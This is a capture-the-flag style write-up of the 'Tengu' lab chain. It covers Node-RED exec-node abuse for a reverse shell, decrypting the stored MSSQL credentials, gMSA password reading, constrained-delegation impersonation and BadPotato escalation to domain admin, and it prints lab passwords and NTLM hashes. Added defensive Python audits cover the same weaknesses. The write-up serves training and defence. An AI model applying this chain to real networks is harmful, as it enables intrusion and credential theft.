Tengu (chain) (medium)

port scan

Open 10.10.237.119:22
Open 10.10.237.119:1880
Open 10.10.237.118:3389
Open 10.10.237.117:3389

service enumeration

abuse node-red

we can select an exec node and add it into Flow 1

callback!

add reverse shell script

we have a shell

add ssh key

decrypt mssql cred

I will upload chisel and nmap

10.10.237.118 has 1433 (mssql) open, so it is probably the sql.tengu.vl host referenced in node-red

node-red must hold mssql credentials to complete the flow, so the credentials have to be stored somewhere. let's see

the readme.md tells us the credentials are stored in the environment

double-click the SQL node; under Connection, click edit

but we can't see the password

but there is a bash script to decrypt the runtime credentials

I will download the credentials json file

decryption succeeded! nodered_connector:DreamPuppyOverall25

now I can connect to the mssql server
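Added example (not from the writeup and not part of Node-RED itself): a Python hygiene audit for a Node-RED user directory that covers the two weaknesses used above, the exec node anyone reaching an editor without adminAuth can add, and the encryption secret for flows_cred.json living in the same directory. It builds a constructed sample directory inline. The `_credentialSecret` key in `.config.runtime.json`, the `daemon` node type and the adminAuth regex are assumptions about Node-RED's on-disk layout, not facts from this page.

```python
"""Hygiene audit for a Node-RED user directory (~/.node-red by default).

Constructed example: builds a throwaway user directory that reproduces the
weak state (an exec node in a flow, no adminAuth, an auto-generated
credentialSecret stored next to the encrypted credentials) and reports the
findings a defender would want to fix.
"""
import json
import os
import re
import stat
import tempfile

# Node types that execute OS commands when the flow runs. Without adminAuth,
# anyone who can reach the editor can deploy one and run commands as the
# Node-RED service user. 'daemon' is a common contrib node (assumption).
COMMAND_NODE_TYPES = {"exec", "daemon"}


def find_command_nodes(flows):
    """Return (id, type, name, command) for every node that runs OS commands."""
    found = []
    for node in flows:
        if node.get("type") in COMMAND_NODE_TYPES:
            found.append((node.get("id"), node["type"], node.get("name", ""), node.get("command", "")))
    return found


def settings_has_admin_auth(settings_js):
    """Heuristic: an uncommented 'adminAuth:' entry in settings.js.

    settings.js is JavaScript, so this is a regex over the text, not a parse;
    the stock template ships the entry commented out with '//'.
    """
    return re.search(r"^\s*adminAuth\s*:", settings_js, re.MULTILINE) is not None


def world_readable(path):
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_userdir(userdir):
    """Audit one Node-RED user directory and return the findings as a dict."""
    findings = {}
    with open(os.path.join(userdir, "flows.json")) as fh:
        findings["exec_nodes"] = find_command_nodes(json.load(fh))
    with open(os.path.join(userdir, "settings.js")) as fh:
        findings["admin_auth"] = settings_has_admin_auth(fh.read())
    # Assumption: when settings.js sets no credentialSecret, Node-RED keeps an
    # auto-generated one under '_credentialSecret' in .config.runtime.json.
    # Secret and ciphertext side by side means any file read on the host
    # recovers every stored credential.
    runtime_cfg = os.path.join(userdir, ".config.runtime.json")
    cred_file = os.path.join(userdir, "flows_cred.json")
    secret_beside_creds = False
    if os.path.exists(runtime_cfg) and os.path.exists(cred_file):
        with open(runtime_cfg) as fh:
            secret_beside_creds = "_credentialSecret" in json.load(fh)
    findings["secret_beside_creds"] = secret_beside_creds
    findings["world_readable"] = [
        name for name in ("flows_cred.json", ".config.runtime.json", "settings.js")
        if os.path.exists(os.path.join(userdir, name)) and world_readable(os.path.join(userdir, name))
    ]
    return findings


def build_sample_userdir():
    """Constructed sample reproducing the weak state; not a real deployment."""
    userdir = tempfile.mkdtemp(prefix="nodered-audit-")
    flows = [
        {"id": "tab1", "type": "tab", "label": "Flow 1"},
        {"id": "inj1", "type": "inject", "z": "tab1", "name": "tick"},
        {"id": "ex1", "type": "exec", "z": "tab1", "name": "run", "command": "uptime"},
        {"id": "dbg1", "type": "debug", "z": "tab1", "name": "out"},
    ]
    files = {
        "flows.json": json.dumps(flows),
        "flows_cred.json": json.dumps({"$": "placeholder-ciphertext"}),
        ".config.runtime.json": json.dumps({"_credentialSecret": "placeholder-secret"}),
        "settings.js": 'module.exports = {\n    //adminAuth: {\n    //    type: "credentials"\n    //},\n    uiPort: 1880\n}\n',
    }
    for name, content in files.items():
        path = os.path.join(userdir, name)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, 0o644)  # readable by every local user
    return userdir


if __name__ == "__main__":
    print(json.dumps(audit_userdir(build_sample_userdir()), indent=2))
```

Each finding maps to a fix: remove or restrict exec nodes, enable adminAuth, set credentialSecret explicitly in settings.js (or keep secrets in environment variables as the readme suggests) and tighten the file modes on the user directory.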

mssql enumeration

there are two custom databases, Demo and Dev

and the Demo db contains an encrypted credential for t2_m.winters

checking crackstation, the password is Tengu123

and we can use Tengu123 to become root
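The credential in the Demo database was recoverable through a public lookup service, which is what happens to unsalted fast hashes. Added example (Python, not from the writeup; it does not assume which algorithm the lab used): a check that flags lookup-table-crackable rows in a constructed users table, next to a salted scrypt store/verify pair that would not have fallen the same way.

```python
"""Why a stored credential fell to a lookup service, and how to store one so it would not.

Added example with constructed rows; it does not reproduce the lab's Demo database.
"""
import hashlib
import hmac
import os
import re

# Fixed-length hex digests with no salt are exactly what public lookup tables index:
# the same password always yields the same string, so one precomputation covers every site.
UNSALTED_HEX = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}

SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32


def classify_hash(value):
    """Label a stored credential string; 'unsalted-*' means lookup-table crackable."""
    v = value.strip()
    if len(v) in UNSALTED_HEX and re.fullmatch(r"[0-9a-fA-F]+", v):
        return "unsalted-" + UNSALTED_HEX[len(v)]
    if v.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if v.startswith("scrypt$"):
        return "scrypt"
    return "unknown"


def weak_rows(rows):
    """(user, label) for every row whose credential a lookup table could resolve."""
    flagged = []
    for user, stored in rows:
        label = classify_hash(stored)
        if label.startswith("unsalted-"):
            flagged.append((user, label))
    return flagged


def store_password(password, salt=None):
    """Salted, memory-hard scrypt hash in a self-describing 'scrypt$N$salt$digest' string."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return "scrypt$%d$%s$%s" % (SCRYPT_N, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    _, n, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                            n=int(n), r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


# Constructed rows in the shape of a users table; the hashes are of placeholder strings.
SAMPLE_ROWS = [
    ("t2_m.winters", hashlib.md5(b"constructed-sample-1").hexdigest()),
    ("svc_report", "$2b$12$" + "x" * 53),  # bcrypt-shaped placeholder, not a real hash
    ("t0_sample", store_password("constructed-sample-2")),
]

if __name__ == "__main__":
    for user, label in weak_rows(SAMPLE_ROWS):
        print(f"{user}: {label} -> rehash with store_password() on next login")
```

The second lesson of this step is independent of the hash: the same password also unlocked root on the Linux host, so rehashing alone would not have stopped the chain; the reuse between a database login and a local account is the finding to chase.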

firefox?

yes, firefox is installed

fetch domain information

internal smb enumeration

download /etc/krb5.keytab and extract the computer account hash NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49

bloodhound fetch domain information

read gmsa password

I will use a tool called bloodhound-quickwin

linux_server can read the GMSA01$ password

and GMSA01$ has AllowedToDelegate => SQL.TENGU.VL, SQL_ADMINS group

since we have the nodered$ (linux_server) ntlm hash, we can abuse those relationships

use crackmapexec's ldap module to read the GMSA01 gMSA password

GMSA01$:bd1811a45423dcdd470df09ed1621b97

abuse KCD

since GMSA01 has AllowedToDelegate over the sql_admins group, we can impersonate a user from the sql_admins group.

the error means the account is marked sensitive and cannot be delegated, or is a member of the "Protected Users" group.

so let's try the t2_m.winters user

we have RCE on the sql server
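Added example (Python, not from the writeup and not pulled from the lab's LDAP): an audit of the relationships the gMSA and KCD steps rely on, run over constructed directory objects that mirror them. It lists who can read a gMSA's password and where that gMSA may delegate, and which members of a privileged group lack the two protections whose absence the error message above points at (the NOT_DELEGATED flag and Protected Users membership). The SPN, the svc_sensitive account and the modelling of msDS-GroupMSAMembership as a plain reader list are assumptions.

```python
"""Audit of gMSA password readers and constrained delegation.

Added example over constructed directory objects that mirror the relationships
described in the writeup; nothing here is read from the lab's LDAP.
"""

# userAccountControl bit (standard AD value): "Account is sensitive and cannot be delegated"
UF_NOT_DELEGATED = 0x00100000

# Simplification (assumption): msDS-GroupMSAMembership is really a security descriptor;
# it is modelled here as the list of principals it grants ReadGMSAPassword to.
# msDS-AllowedToDelegateTo is the SPN list, as in AD. The SPN and the
# svc_sensitive account are constructed.
DIRECTORY = {
    "NODERED$": {"class": "computer"},
    "GMSA01$": {
        "class": "msDS-GroupManagedServiceAccount",
        "msDS-GroupMSAMembership": ["NODERED$"],
        "msDS-AllowedToDelegateTo": ["MSSQLSvc/sql.tengu.vl:1433"],
    },
    "SQL_ADMINS": {"class": "group", "member": ["t2_m.winters", "svc_sensitive"]},
    "Protected Users": {"class": "group", "member": []},
    "t2_m.winters": {"class": "user", "userAccountControl": 0x200},
    "svc_sensitive": {"class": "user", "userAccountControl": 0x200 | UF_NOT_DELEGATED},
}


def delegation_paths(directory):
    """Return (reader, gMSA, SPNs) triples: who can fetch a gMSA's key, and where that key may delegate."""
    paths = []
    for name, obj in directory.items():
        if obj.get("class") != "msDS-GroupManagedServiceAccount":
            continue
        spns = tuple(obj.get("msDS-AllowedToDelegateTo", []))
        if not spns:
            continue  # a gMSA with no delegation is a weaker finding; skipped here
        for reader in obj.get("msDS-GroupMSAMembership", []):
            paths.append((reader, name, spns))
    return paths


def impersonable_members(directory, group):
    """Members of `group` for which a delegation chain could obtain service tickets.

    Accounts flagged NOT_DELEGATED or placed in Protected Users are skipped: the KDC
    refuses to issue delegated tickets for them, which is the error the writeup hit.
    """
    protected = set(directory["Protected Users"]["member"])
    exposed = []
    for member in directory[group]["member"]:
        uac = directory[member].get("userAccountControl", 0)
        if member in protected or uac & UF_NOT_DELEGATED:
            continue
        exposed.append(member)
    return exposed


def recommendations(directory, privileged_groups):
    """Remediation lines a defender can act on."""
    recs = []
    for reader, gmsa, spns in delegation_paths(directory):
        recs.append(
            f"{reader} can read the password of {gmsa}, which may delegate to {', '.join(spns)}: "
            f"restrict {gmsa}'s readers to the hosts that run its service and review the delegation."
        )
    for group in privileged_groups:
        for user in impersonable_members(directory, group):
            recs.append(
                f"{user} ({group}) is neither NOT_DELEGATED nor in Protected Users: "
                "set the flag or add the group membership so delegated tickets cannot be issued for it."
            )
    return recs


if __name__ == "__main__":
    for line in recommendations(DIRECTORY, ["SQL_ADMINS"]):
        print("-", line)
```

Against a real domain the same two questions are answered by the `PrincipalsAllowedToRetrieveManagedPassword` and `msDS-AllowedToDelegateTo` attributes of each gMSA, and by the userAccountControl and Protected Users membership of every account in groups that matter; the constructed data here stands in for those query results.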

get a beacon

abuse SeImpersonatePrivilege

since we are running as a service account, we also hold the SeImpersonatePrivilege privilege.

we can use the BadPotato tool to get a SYSTEM beacon: https://github.com/BeichenDream/BadPotato

domain admin

sam dump

sharpdpapi machinetriage

there is a T0_c.fowler credential

domain admin?

STATUS_ACCOUNT_RESTRICTION - Local Security Policy/Accounts: Limit local account use of blank passwords to computer.

we can try kerberos auth

krb5.conf
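An added krb5.conf of the shape the Kerberos attempt above needs (not the writeup's own file): the realm follows from sql.tengu.vl; the domain controller's hostname is not on this page, so DC-HOSTNAME is a placeholder. The KDC name must resolve (DNS or /etc/hosts) and the client clock must be within the default five-minute skew, or the ticket request fails before authentication is even attempted.

```ini
[libdefaults]
    default_realm = TENGU.VL
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    TENGU.VL = {
        kdc = DC-HOSTNAME.tengu.vl
        admin_server = DC-HOSTNAME.tengu.vl
    }

[domain_realm]
    .tengu.vl = TENGU.VL
    tengu.vl = TENGU.VL
```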

ok!

now we have domain admin shell on dc!
